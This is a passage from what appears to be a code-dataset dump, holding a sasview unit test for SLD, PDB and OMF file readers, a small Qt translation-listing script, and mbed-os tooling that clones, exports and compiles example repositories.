    GenSAS calculator, using fixture files from the data directory."""
    def setUp(self):
        # One reader instance per supported file format.
        self.sldloader = sas_gen.SLDReader()
        self.pdbloader = sas_gen.PDBReader()
        self.omfloader = sas_gen.OMFReader()
    def test_sldreader(self):
        """
        Test .sld file loaded: first point position matches the fixture.
        """
        f = self.sldloader.read(find("sld_file.sld"))
        self.assertEqual(f.pos_x[0], -40.5)
        self.assertEqual(f.pos_y[0], -13.5)
        self.assertEqual(f.pos_z[0], -13.5)
    def test_pdbreader(self):
        """
        Test .pdb file loaded: first atom position of c60 matches.
        """
        f = self.pdbloader.read(find("c60.pdb"))
        self.assertEqual(f.pos_x[0], -0.733)
        self.assertEqual(f.pos_y[0], -1.008)
        self.assertEqual(f.pos_z[0], 3.326)
    def test_omfreader(self):
        """
        Test .omf file loaded and converted to SLD representation.
        """
        f = self.omfloader.read(find("A_Raw_Example-1.omf"))
        output = sas_gen.OMF2SLD()
        output.set_data(f)
        # First cell has zero magnetization and sits at the origin.
        self.assertEqual(f.mx[0], 0)
        self.assertEqual(f.my[0], 0)
        self.assertEqual(f.mz[0], 0)
        self.assertEqual(output.pos_x[0], 0.0)
        self.assertEqual(output.pos_y[0], 0.0)
        self.assertEqual(output.pos_z[0], 0.0)
    def test_calculator(self):
        """
        Test that the calculator calculates (no result values asserted;
        this only checks runXY completes on OMF-derived SLD data).
        """
        f = self.omfloader.read(find("A_Raw_Example-1.omf"))
        omf2sld = sas_gen.OMF2SLD()
        omf2sld.set_data(f)
        model = sas_gen.GenSAS()
        model.set_sld_data(omf2sld.output)
        # Skip q=0 to avoid the trivial first point.
        x = np.linspace(0, 0.1, 11)[1:]
        model.runXY([x, x])
if __name__ == '__main__':
unittest.main()
| 25.5 | 68 | 0.594065 |
import os.path
import warnings
warnings.simplefilter("ignore")
import unittest
import numpy as np
from sas.sascalc.calculator import sas_gen
def find(filename):
return os.path.join(os.path.dirname(__file__), 'data', filename)
class sas_gen_test(unittest.TestCase):
def setUp(self):
self.sldloader = sas_gen.SLDReader()
self.pdbloader = sas_gen.PDBReader()
self.omfloader = sas_gen.OMFReader()
def test_sldreader(self):
f = self.sldloader.read(find("sld_file.sld"))
self.assertEqual(f.pos_x[0], -40.5)
self.assertEqual(f.pos_y[0], -13.5)
self.assertEqual(f.pos_z[0], -13.5)
def test_pdbreader(self):
f = self.pdbloader.read(find("c60.pdb"))
self.assertEqual(f.pos_x[0], -0.733)
self.assertEqual(f.pos_y[0], -1.008)
self.assertEqual(f.pos_z[0], 3.326)
def test_omfreader(self):
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
output = sas_gen.OMF2SLD()
output.set_data(f)
self.assertEqual(f.mx[0], 0)
self.assertEqual(f.my[0], 0)
self.assertEqual(f.mz[0], 0)
self.assertEqual(output.pos_x[0], 0.0)
self.assertEqual(output.pos_y[0], 0.0)
self.assertEqual(output.pos_z[0], 0.0)
def test_calculator(self):
f = self.omfloader.read(find("A_Raw_Example-1.omf"))
omf2sld = sas_gen.OMF2SLD()
omf2sld.set_data(f)
model = sas_gen.GenSAS()
model.set_sld_data(omf2sld.output)
x = np.linspace(0, 0.1, 11)[1:]
model.runXY([x, x])
if __name__ == '__main__':
unittest.main()
| true | true |
f72eb81e6b4626299dd47b3dfad9d67bad9b3205 | 629 | py | Python | contrib/qt_translations.py | TheFreedomCoin/Freedom-Coin | e679946333f7090ea2afaab213419d31d5e91870 | [
"MIT"
] | 2 | 2018-06-15T08:41:56.000Z | 2018-11-01T05:37:50.000Z | contrib/qt_translations.py | TheFreedomCoin/sentinel2repo | e679946333f7090ea2afaab213419d31d5e91870 | [
"MIT"
] | null | null | null | contrib/qt_translations.py | TheFreedomCoin/sentinel2repo | e679946333f7090ea2afaab213419d31d5e91870 | [
"MIT"
] | 7 | 2018-05-10T19:09:51.000Z | 2021-06-26T18:12:26.000Z | #!/usr/bin/env python
# Helpful little script that spits out a comma-separated list of
# language codes for Qt icons that should be included
# in binary transfer distributions
import glob
import os
import re
import sys
# Expect exactly two arguments: Qt's translations dir and the wallet's
# locale dir.
if len(sys.argv) != 3:
    sys.exit("Usage: %s $QTDIR/translations $FreedomcoinDIR/src/qt/locale"%sys.argv[0])
d1 = sys.argv[1]
d2 = sys.argv[2]
# Locale codes for which Qt itself ships a translation (qt_XX.qm).
l1 = set([ re.search(r'qt_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d1, 'qt_*.qm')) ])
# Locale codes for which the wallet ships a translation (Freedomcoin_XX.qm).
l2 = set([ re.search(r'Freedomcoin_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d2, 'Freedomcoin_*.qm')) ])
# Python 2 print statement: emit the locales present in BOTH sets,
# comma-separated and sorted.
print ",".join(sorted(l1.intersection(l2)))
| 27.347826 | 116 | 0.688394 |
import glob
import os
import re
import sys
if len(sys.argv) != 3:
sys.exit("Usage: %s $QTDIR/translations $FreedomcoinDIR/src/qt/locale"%sys.argv[0])
d1 = sys.argv[1]
d2 = sys.argv[2]
l1 = set([ re.search(r'qt_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d1, 'qt_*.qm')) ])
l2 = set([ re.search(r'Freedomcoin_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d2, 'Freedomcoin_*.qm')) ])
print ",".join(sorted(l1.intersection(l2)))
| false | true |
f72eb836bf1ae0ede245207bbaad409be8cbc77e | 22,844 | py | Python | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 2 | 2021-01-28T09:12:02.000Z | 2021-01-28T11:03:26.000Z | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 7 | 2019-04-11T10:12:18.000Z | 2020-10-27T12:54:57.000Z | tools/test/examples/examples_lib.py | Eric-A-Marks/mbed-os | 4ba07d9413fbf7bae2db97a06e4eb4f275063d93 | [
"Apache-2.0"
] | 2 | 2016-07-21T12:40:27.000Z | 2016-07-22T11:29:19.000Z | #!/usr/bin/env python
"""
Copyright (c) 2017-2019 ARM Limited. All rights reserved.
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations
"""
import os
from os.path import dirname, abspath, basename, join, normpath
import os.path
import sys
import copy
import stat
import subprocess
from shutil import rmtree
import json
import logging
logging.basicConfig(level=logging.DEBUG, format='[EXAMPLES]> %(levelname)-8s %(message)s')
""" Import and bulid a bunch of example programs
This library includes functions that are shared between the examples.py and
the update.py modules.
"""
MBED_OS_ROOT = abspath(dirname(dirname(dirname(dirname(__file__)))))
CWD = os.getcwd()
sys.path.insert(0, MBED_OS_ROOT)
from tools.build_api import get_mbed_official_release
from tools.targets import TARGET_MAP
from tools.export import EXPORTERS
from tools.project import EXPORTER_ALIASES
from tools.toolchains import TOOLCHAINS
from tools.utils import write_json_to_file
from prettytable import PrettyTable
SUPPORTED_TOOLCHAINS = list(TOOLCHAINS - set(u'uARM'))
SUPPORTED_IDES = [exp for exp in list(EXPORTERS) + list(EXPORTER_ALIASES)
if exp != "cmsis" and exp != "zip"]
def get_table_from_pretty_table(pretty_table):
    """Convert a PrettyTable into a list of {field: cell-text} dicts.

    Each row is mutated (border/header turned off) so get_string()
    yields only the cell value, which is then stripped of padding.
    """
    table_rows = []
    for row in pretty_table:
        row.border = False
        row.header = False
        entry = dict(
            (field, row.get_string(fields=[field]).strip())
            for field in pretty_table.field_names)
        table_rows.append(entry)
    return table_rows
def get_build_summary(results):
    """Print the compilation results of the example programs.

    Args:
    results - output of compile_repos(): maps example name to
              [compiled, pass_status, successes, failures].

    Also dumps the combined pass/fail rows to build_data.json.

    Returns: number of failed builds.
    """
    pass_table = PrettyTable()
    pass_table.field_names = ["EXAMPLE NAME", "TARGET", "TOOLCHAIN", "TEST GEN", "BUILD RESULT"]
    pass_table.align["EXAMPLE NAME"] = "l"
    fail_table = copy.deepcopy(pass_table)
    failure_counter = 0
    for exp, status in list(results.items()):
        # status[2] = successes, status[3] = failures (see compile_repos).
        for summary in status[2]:
            pass_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "PASSED"])
        for summary in status[3]:
            fail_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "FAILED"])
            failure_counter+=1
    print("\n\nPassed Example Compilation:")
    print(pass_table)
    if (failure_counter > 0):
        print("\n\nFailed Example Compilation:")
        print(fail_table)
    print("Number of failures = %d" % failure_counter)
    # Persist all rows (pass and fail) as JSON for downstream tooling.
    rows = get_table_from_pretty_table(pass_table) + get_table_from_pretty_table(fail_table)
    with open("build_data.json", "w") as write_file:
        json.dump(rows, write_file, indent=4, sort_keys=True)
    return failure_counter
def get_export_summary(results):
    """Print the export/build results of the example programs.

    Args:
    results - output of export_repos(): maps example name to
              [exported, pass_status, successes, export_failures,
               build_failures, build_skips].

    Returns: number of failed exports/builds (skips do not count).
    """
    pass_table = PrettyTable()
    pass_table.field_names = ["EXAMPLE NAME", "TARGET", "IDE", "EXPORT RESULT", "BUILD RESULT"]
    pass_table.align["EXAMPLE NAME"] = "l"
    fail_table = copy.deepcopy(pass_table)
    failure_counter = 0
    for exp, status in list(results.items()):
        # status[2]=successes, [3]=export failures, [4]=build failures,
        # [5]=build skips (exporter has no build step).
        for summary in status[2]:
            pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "PASSED"])
        for summary in status[3]:
            fail_table.add_row([summary["name"], summary["target"], summary["ide"], "FAILED", ""])
            failure_counter+=1
        for summary in status[4]:
            fail_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "FAILED"])
            failure_counter+=1
        for summary in status[5]:
            pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "SKIPPED"])
    print("\n\nPassed Example Exporting:")
    print(pass_table)
    if (failure_counter > 0):
        print("\n\nFailed Example Exporting:")
        print(fail_table)
    print("Number of failures = %d" % failure_counter)
    return failure_counter
def valid_choices(allowed_choices, all_choices):
    """Return the members of *all_choices* permitted by *allowed_choices*.

    An empty (or None) *allowed_choices* means "no restriction": the
    full *all_choices* list is returned unchanged. Order of
    *all_choices* is preserved. (Uses truthiness instead of
    ``len(...) > 0``, which also tolerates None.)
    """
    if not allowed_choices:
        return all_choices
    return [choice for choice in all_choices if choice in allowed_choices]
def target_cross_toolchain(allowed_targets, allowed_toolchains, features=[]):
    """Generate (target, toolchain) pairs.

    Args:
    allowed_targets - a list of all possible targets
    allowed_toolchains - a list of all possible toolchains

    Kwargs:
    features - the features that must all be present in the target's
               TARGET_MAP features array for the pair to be yielded

    Note: the mutable default ``features=[]`` is safe here because the
    list is only read, never mutated.
    """
    for target in allowed_targets:
        for toolchain in allowed_toolchains:
            if all(feature in TARGET_MAP[target].features
                   for feature in features):
                yield target, toolchain
def target_cross_ide(allowed_targets, allowed_ides, features=[], toolchains=[]):
    """Generate (target, ide) pairs.

    Args:
    allowed_targets - a list of all possible targets
    allowed_ides - a list of all possible IDEs

    Kwargs:
    features - the features that must all be present in the target's
               TARGET_MAP features array
    toolchains - when non-empty, restrict to exporters whose TOOLCHAIN
                 is in this list

    Note: the mutable defaults are safe here because the lists are only
    read, never mutated.
    """
    for target in allowed_targets:
        for ide in allowed_ides:
            # Exporter must support the target, match the (optional)
            # toolchain restriction, and the target must have all features.
            if (EXPORTERS[ide].is_target_supported(target) and
                (not toolchains or EXPORTERS[ide].TOOLCHAIN in toolchains) and
                all(feature in TARGET_MAP[target].features
                    for feature in features)):
                yield target, ide
def get_sub_examples_list(example):
    """Return the example names to operate on.

    For a multi-example repository ('sub-repo-example' true) this is
    "<repo>/<sub>" for every entry in example['subs']; otherwise just
    the repository name itself.
    """
    if not example['sub-repo-example']:
        return [example["name"]]
    return ["%s/%s" % (example["name"], sub) for sub in example['subs']]
def source_repos(config, exp_filter):
    """Import each selected example repo (and its .lib dependencies)
    with `mbed-cli import`.

    An existing clone is deleted first to guarantee a clean, up-to-date
    import. Stops at the first failing import and returns its exit
    code; returns 0 on full success.

    Args:
    config - the json object imported from the file.
    exp_filter - list of example names to process.
    """
    print("\nImporting example repos....\n")
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                logging.warning("'%s' example directory already exists. Deleting..." % name)
                rmtree(name)
            cmd = "mbed-cli import %s" % example['github']
            logging.info("Executing command '%s'..." % cmd)
            result = subprocess.call(cmd, shell=True)
            if result:
                # Propagate the failing command's exit code.
                return result
    return 0
def clone_repos(config, exp_filter , retry = 3):
    """Clone each selected example repo with `git clone`, retrying up
    to *retry* times.

    An existing clone is deleted first to guarantee a clean, up-to-date
    clone. Returns 1 when a repo cannot be cloned after all retries,
    0 on full success.

    Args:
    config - the json object imported from the file.
    exp_filter - list of example names to process.
    retry - number of clone attempts per repo.
    """
    print("\nCloning example repos....\n")
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                logging.warning("'%s' example directory already exists. Deleting..." % name)
                rmtree(name, onerror=remove_readonly)
            cmd = "git clone %s" % example['github']
            # for/else: the else arm only runs when no attempt broke out
            # of the loop, i.e. every clone attempt failed.
            for i in range(0, retry):
                logging.info("Executing command '%s'..." % cmd)
                if not subprocess.call(cmd, shell=True):
                    break
            else:
                logging.error("unable to clone the repo '%s'" % name)
                return 1
    return 0
def deploy_repos(config, exp_filter):
    """Run `mbed-cli deploy` in each existing example directory to pull
    in the example's dependencies.

    Returns 0 when every filtered example deploys successfully; the
    deploy command's exit code on failure; 1 when an example directory
    is missing.

    Bug fix: the `return 1` previously sat OUTSIDE the else branch, so
    the function aborted (returning 1) after the first filtered example
    even when its deploy succeeded. It now only fires for a missing
    directory, matching upstream behavior.

    Args:
    config - the json object imported from the file.
    exp_filter - list of example names to process.
    """
    print("\nDeploying example repos....\n")
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                cmd = "mbed-cli deploy"
                logging.info("Executing command '%s'..." % cmd)
                result = subprocess.call(cmd, shell=True)
                os.chdir(CWD)
                if result:
                    logging.error("mbed-cli deploy command failed for '%s'" % name)
                    return result
            else:
                logging.info("'%s' example directory doesn't exist. Skipping..." % name)
                return 1
    return 0
def export_repos(config, ides, targets, exp_filter):
    """Export and build combinations of example programs, targets and IDEs.

    The results are returned as a {example name: value} dict where value is
    [exported, pass_status, successes, export_failures, build_failures,
    build_skips]:
        exported        - False when the example opts out of exporting.
        pass_status     - True when no export or build failed.
        successes       - summaries that exported and built (or exported,
                          when the exporter has no build step).
        export_failures - summaries that failed to export.
        build_failures  - summaries that exported but failed to build.
        build_skips     - summaries whose exporter cannot build.
    Each summary carries the example name, target and IDE.

    Args:
    config - the json object imported from the file.
    ides - List of IDEs to export to.
    targets - list of target names.
    exp_filter - list of example names to process.
    """
    results = {}
    print("\nExporting example repos....\n")
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        export_failures = []
        build_failures = []
        build_skips = []
        successes = []
        exported = True
        pass_status = True
        if example['export']:
            for name in get_sub_examples_list(example):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                # Check that the target, IDE, and features combinations are valid and return a
                # list of valid combinations to work through
                for target, ide in target_cross_ide(valid_choices(example['targets'], targets),
                                                    valid_choices(example['exporters'], ides),
                                                    example['features'], example['toolchains']):
                    example_summary = {"name" : name, "target" : target, "ide" : ide }
                    summary_string = "%s %s %s" % (name, target, ide)
                    logging.info("Exporting %s" % summary_string)
                    cmd = ["mbed-cli", "export", "-i", ide, "-m", target]
                    logging.info("Executing command '%s'..." % " ".join(cmd))
                    proc = subprocess.Popen(cmd)
                    proc.wait()
                    if proc.returncode:
                        export_failures.append(example_summary)
                        logging.error("FAILURE exporting %s" % summary_string)
                    else:
                        logging.info("SUCCESS exporting %s" % summary_string)
                        logging.info("Building %s" % summary_string)
                        try:
                            if EXPORTERS[ide].build(name, cleanup=False):
                                logging.error("FAILURE building %s" % summary_string)
                                build_failures.append(example_summary)
                            else:
                                logging.info("SUCCESS building %s" % summary_string)
                                successes.append(example_summary)
                        except TypeError:
                            # Exporter has no build support: export alone
                            # counts as success, but record the skip.
                            successes.append(example_summary)
                            build_skips.append(example_summary)
                os.chdir(CWD)
            if len(build_failures+export_failures) > 0:
                pass_status= False
        else:
            exported = False
        results[example['name']] = [exported, pass_status, successes,
                                    export_failures, build_failures, build_skips]
    return results
def compile_repos(config, toolchains, targets, profiles, verbose, exp_filter, cmake=False ,jobs=0):
    """Compile combinations of example programs, targets and toolchains.

    The results are returned as a {example name: value} dict where value is
    [compiled, pass_status, successes, failures]:
        compiled    - False when the example opts out of compilation.
        pass_status - True when every build of the example set passed.
        successes   - summaries of passing builds.
        failures    - summaries of failing builds.
    Each summary carries the example name, target, toolchain and test
    status. A test_spec.json describing testable builds is also written.

    Args:
    config - the json object imported from the file.
    toolchains - List of toolchains to compile for.
    targets - list of target names
    profiles - build profile path(s) or name(s) if in default place
    verbose - enabling verbose
    exp_filter - List of example names to be built
    cmake - use mbed-tools (CMake) instead of mbed-cli
    jobs - Number of compile jobs
    """
    results = {}
    test_json = {"builds":{}}
    base_path = os.getcwd()
    print("\nCompiling example repos....\n")
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        failures = []
        successes = []
        compiled = True
        pass_status = True
        if example['test']:
            # Testing needs both keys; degrade to compile-only otherwise.
            if not ('baud_rate' in example and 'compare_log'in example):
                logging.warning("'baud_rate' or 'compare_log' keys are missing from config json file")
                example['test'] = False
        if example['compile']:
            for name in get_sub_examples_list(example):
                os.chdir(name)
                logging.info("In folder '%s'" % name)
                # Check that the target, toolchain and features combinations are valid and return a
                # list of valid combinations to work through
                for target, toolchain in target_cross_toolchain(valid_choices(example['targets'], targets),
                                                                valid_choices(example['toolchains'], toolchains),
                                                                example['features']):
                    example_summary = {"name" : name, "target" : target, "toolchain" : toolchain, "test": "UNSET"}
                    summary_string = "%s %s %s" % (name, target, toolchain)
                    logging.info("Compiling %s" % summary_string)
                    if cmake:
                        build_command_seq = ["mbed-tools compile -t {} -m {} -c".format(toolchain, target)]
                    else:
                        build_command_seq = ["mbed-cli compile -t {} -m {} -j {} {}".format(toolchain, target, str(jobs), '-vv' if verbose else '') ]
                    if profiles:
                        for profile in profiles:
                            build_command_seq[0] += " --profile {}".format(profile)
                    failed_flag = False
                    for build_command in build_command_seq:
                        logging.info("Executing command '%s'..." % build_command)
                        proc = subprocess.Popen(build_command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                        std_out, std_err = proc.communicate()
                        std_out = std_out.decode()
                        std_err = std_err.decode()
                        print ("\n#### STDOUT ####\n%s\n#### STDERR ####\n%s\n#### End of STDOUT/STDERR ####\n" % (std_out,std_err))
                        if proc.returncode:
                            failures.append(example_summary)
                            failed_flag = True
                            break
                    if not failed_flag:
                        if example['test']:
                            log = example['compare_log'].pop(0)
                            # example['compare_log'] is a list of log file/files, which matches each examples/sub-examples from same repo.
                            # pop the log file out of list regardless the compilation for each example pass of fail
                            image = fetch_output_image(std_out,cmake)
                            if image:
                                image_info = [{"binary_type": "bootable","path": normpath(join(name,image)),"compare_log":log}]
                                test_group = "{}-{}-{}".format(target, toolchain, example['baud_rate'])
                                if not test_group in test_json['builds']:
                                    test_json['builds'][test_group] = {
                                        "platform":target ,
                                        "toolchain": toolchain ,
                                        "base_path": base_path ,
                                        "baud_rate": int(example['baud_rate']),
                                        "tests":{} }
                                test_json['builds'][test_group]['tests'][name]={"binaries":image_info}
                                example_summary["test"] = "TEST_ON"
                            else:
                                logging.warning("could not find built image for example %s" % name)
                                example_summary["test"] = "NO_IMAGE"
                        else:
                            logging.warning("Test for %s will not be generated." % name)
                            example_summary["test"] = "TEST_OFF"
                        successes.append(example_summary)
                os.chdir(CWD)
            # If there are any compilation failures for the example 'set' then the overall status is fail.
            if len(failures) > 0:
                pass_status = False
        else:
            compiled = False
        results[example['name']] = [compiled, pass_status, successes, failures]
    write_json_to_file(test_json, "test_spec.json")
    return results
def update_example_version(config, tag, exp_filter):
    """Check out GitHub branch/tag *tag* in every selected (already
    cloned) example repo.

    Stops at the first failing checkout and returns its exit code;
    returns 0 on full success.

    Args:
    config - the json object imported from the file.
    tag - GitHub tag corresponding to a version of mbed-os to upgrade to.
    exp_filter - list of example names to process.
    """
    print("\nUpdating example to version(branch) '%s'\n" % tag)
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            os.chdir(name)
            logging.info("In folder '%s'" % name)
            # Force-create a local branch tracking the remote tag/branch.
            cmd = "git checkout -B %s origin/%s" %(tag, tag)
            logging.info("Executing command '%s'..." % cmd)
            result = subprocess.call(cmd, shell=True)
            os.chdir(CWD)
            if result:
                return result
    return 0
def symlink_mbedos(config, path, exp_filter):
    """Create an 'mbed-os' symbolic link to *path* in each example folder.

    An existing mbed-os.lib is emptied (not deleted) so mbed-cli does
    not try to fetch its own copy; an empty mbed-os.lib is (re)created
    because the CMake tooling requires the file to exist. Returns 0.

    Args:
    config - the json object imported from the file.
    path - directory the symlink should point at (an mbed-os checkout).
    exp_filter - list of example names to process.
    """
    print("\nCreating mbed-os Symbolic link to '%s'\n" % path)
    for example in config['examples']:
        if example['name'] not in exp_filter:
            continue
        for name in get_sub_examples_list(example):
            os.chdir(name)
            logging.info("In folder '%s'" % name)
            if os.path.exists("mbed-os.lib"):
                logging.info("Replacing 'mbed-os.lib' with empty file in '%s'" % name)
                open("mbed-os.lib", 'w').close()
            else:
                logging.warning("No 'mbed-os.lib' found in '%s'" % name)
            if os.path.exists("mbed-os"):
                logging.warning("'mbed-os' already existed in '%s'" % name)
            else:
                logging.info("Creating Symbolic link '%s'->'mbed-os'" % path)
                os.symlink(path, "mbed-os")
            #Cmake tool currently require 'mbed-os.lib' to be present to perform build.
            #Add a empty 'mbed-os.lib' as a workaround
            open('mbed-os.lib', 'a').close()
            os.chdir(CWD)
    return 0
def fetch_output_image(output, cmake):
    """Search the last 30 lines of a build log for the produced image path.

    With *cmake* True the mbed-tools log format ("-- built: ...bin") is
    expected; otherwise the mbed-cli format ("Image: ...").  Returns the
    image path (relative for the CMake flavour) when the file exists on
    disk, otherwise False.
    """
    log_lines = output.splitlines()
    stop = -31 if len(log_lines) > 29 else (-1 - len(log_lines))
    for idx in range(-1, stop, -1):
        line = log_lines[idx]
        if cmake:
            if line.startswith("-- built:") and line.endswith(".bin"):
                candidate = line[10:]
                print("IMAGE is " + candidate)
                if os.path.isfile(candidate):
                    return os.path.relpath(candidate)
        elif line.startswith("Image:"):
            candidate = line[7:]
            if os.path.isfile(candidate):
                return candidate
    return False
| 42.859287 | 149 | 0.573761 |
import os
from os.path import dirname, abspath, basename, join, normpath
import os.path
import sys
import copy
import stat
import subprocess
from shutil import rmtree
import json
import logging
logging.basicConfig(level=logging.DEBUG, format='[EXAMPLES]> %(levelname)-8s %(message)s')
MBED_OS_ROOT = abspath(dirname(dirname(dirname(dirname(__file__)))))
CWD = os.getcwd()
sys.path.insert(0, MBED_OS_ROOT)
from tools.build_api import get_mbed_official_release
from tools.targets import TARGET_MAP
from tools.export import EXPORTERS
from tools.project import EXPORTER_ALIASES
from tools.toolchains import TOOLCHAINS
from tools.utils import write_json_to_file
from prettytable import PrettyTable
SUPPORTED_TOOLCHAINS = list(TOOLCHAINS - set(u'uARM'))
SUPPORTED_IDES = [exp for exp in list(EXPORTERS) + list(EXPORTER_ALIASES)
if exp != "cmsis" and exp != "zip"]
def get_table_from_pretty_table(pretty_table):
    """Convert a PrettyTable into a list of {field_name: cell_string} dicts.

    NOTE(review): mutates each row object's ``border``/``header`` flags so
    that ``get_string`` renders only the bare cell text.
    """
    rows = []
    for pretty_row in pretty_table:
        row = {}
        for key in pretty_table.field_names:
            # Strip the table decoration so only the cell value is rendered.
            pretty_row.border = False
            pretty_row.header = False
            row[key] = pretty_row.get_string(fields=[key]).strip()
        rows.append(row)
    return rows
def get_build_summary(results):
    """Print pass/fail tables for compile results and dump them to build_data.json.

    *results* maps example name -> [compiled, pass_status, successes, failures]
    as produced by compile_repos (status[2] = passed builds, status[3] = failed
    builds).  Returns the number of failed builds.
    """
    pass_table = PrettyTable()
    pass_table.field_names = ["EXAMPLE NAME", "TARGET", "TOOLCHAIN", "TEST GEN", "BUILD RESULT"]
    pass_table.align["EXAMPLE NAME"] = "l"
    # Same columns/alignment for the failure table.
    fail_table = copy.deepcopy(pass_table)
    failure_counter = 0
    for exp, status in list(results.items()):
        for summary in status[2]:
            pass_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "PASSED"])
        for summary in status[3]:
            fail_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "FAILED"])
            failure_counter+=1
    print("\n\nPassed Example Compilation:")
    print(pass_table)
    if (failure_counter > 0):
        print("\n\nFailed Example Compilation:")
        print(fail_table)
    print("Number of failures = %d" % failure_counter)
    # Persist a machine-readable copy of both tables for later reporting.
    rows = get_table_from_pretty_table(pass_table) + get_table_from_pretty_table(fail_table)
    with open("build_data.json", "w") as write_file:
        json.dump(rows, write_file, indent=4, sort_keys=True)
    return failure_counter
def get_export_summary(results):
    """Print pass/fail tables for export results.

    *results* maps example name -> [exported, pass_status, successes,
    export_failures, build_failures, build_skips] as produced by
    export_repos.  Returns the number of failures (export failures plus
    build failures; skipped builds are reported but not counted).
    """
    pass_table = PrettyTable()
    pass_table.field_names = ["EXAMPLE NAME", "TARGET", "IDE", "EXPORT RESULT", "BUILD RESULT"]
    pass_table.align["EXAMPLE NAME"] = "l"
    fail_table = copy.deepcopy(pass_table)
    failure_counter = 0
    for exp, status in list(results.items()):
        for summary in status[2]:
            pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "PASSED"])
        for summary in status[3]:
            fail_table.add_row([summary["name"], summary["target"], summary["ide"], "FAILED", ""])
            failure_counter+=1
        for summary in status[4]:
            fail_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "FAILED"])
            failure_counter+=1
        for summary in status[5]:
            # Export succeeded but the IDE has no headless build step.
            pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "SKIPPED"])
    print("\n\nPassed Example Exporting:")
    print(pass_table)
    if (failure_counter > 0):
        print("\n\nFailed Example Exporting:")
        print(fail_table)
    print("Number of failures = %d" % failure_counter)
    return failure_counter
def valid_choices(allowed_choices, all_choices):
    """Restrict *all_choices* to the entries present in *allowed_choices*.

    An empty *allowed_choices* acts as a wildcard: *all_choices* is
    returned unchanged (the same object, not a copy).
    """
    if not allowed_choices:
        return all_choices
    return [choice for choice in all_choices if choice in allowed_choices]
def target_cross_toolchain(allowed_targets, allowed_toolchains, features=None):
    """Yield every (target, toolchain) pair whose target supports all *features*.

    Args:
    allowed_targets - target names to consider (keys into TARGET_MAP).
    allowed_toolchains - toolchain names to pair with each target.
    features - optional list of target features that must all be present.
    """
    # Idiom fix: avoid a mutable default argument (was features=[]).
    # The old default was never mutated, so behaviour is unchanged.
    features = features or []
    for target in allowed_targets:
        for toolchain in allowed_toolchains:
            if all(feature in TARGET_MAP[target].features
                   for feature in features):
                yield target, toolchain
def target_cross_ide(allowed_targets, allowed_ides, features=None, toolchains=None):
    """Yield every (target, ide) pair the exporter supports.

    A pair qualifies when the exporter supports the target, the exporter's
    toolchain is in *toolchains* (empty list means "any"), and the target
    provides every feature in *features*.
    """
    # Same mutable-default fix as above (was features=[], toolchains=[]).
    features = features or []
    toolchains = toolchains or []
    for target in allowed_targets:
        for ide in allowed_ides:
            if (EXPORTERS[ide].is_target_supported(target) and
                (not toolchains or EXPORTERS[ide].TOOLCHAIN in toolchains) and
                all(feature in TARGET_MAP[target].features
                    for feature in features)):
                yield target, ide
def get_sub_examples_list(example):
    """Return the buildable folder paths for *example*.

    A multi-example repo ('sub-repo-example' true) yields one
    "<repo>/<sub>" path per entry in 'subs'; otherwise the repo name
    itself is the single buildable folder.
    """
    repo = example["name"]
    if not example["sub-repo-example"]:
        return [repo]
    return ["%s/%s" % (repo, sub) for sub in example["subs"]]
def source_repos(config, exp_filter):
    """Import each filtered example repo with ``mbed-cli import``.

    Pre-existing example directories are deleted first.  Returns the first
    non-zero mbed-cli exit status, or 0 when every import succeeds.
    """
    print("\nImporting example repos....\n")
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                logging.warning("'%s' example directory already exists. Deleting..." % name)
                rmtree(name)
            cmd = "mbed-cli import %s" % example['github']
            logging.info("Executing command '%s'..." % cmd)
            result = subprocess.call(cmd, shell=True)
            if result:
                return result
    return 0
def clone_repos(config, exp_filter , retry = 3):
    """Clone each filtered example repo with plain ``git clone``.

    Each clone is attempted up to *retry* times.  Returns 1 as soon as one
    repo cannot be cloned, 0 otherwise.
    """
    print("\nCloning example repos....\n")
    for example in config['examples']:
        name = example['name']
        if name in exp_filter:
            if os.path.exists(name):
                logging.warning("'%s' example directory already exists. Deleting..." % name)
                # remove_readonly: presumably the error handler from tools.utils
                # (star-imported above) that clears read-only bits on Windows -- verify.
                rmtree(name, onerror=remove_readonly)
            cmd = "git clone %s" % example['github']
            for i in range(0, retry):
                logging.info("Executing command '%s'..." % cmd)
                if not subprocess.call(cmd, shell=True):
                    break
            else:
                # for/else: runs only when all retry attempts failed.
                logging.error("unable to clone the repo '%s'" % name)
                return 1
    return 0
def deploy_repos(config, exp_filter):
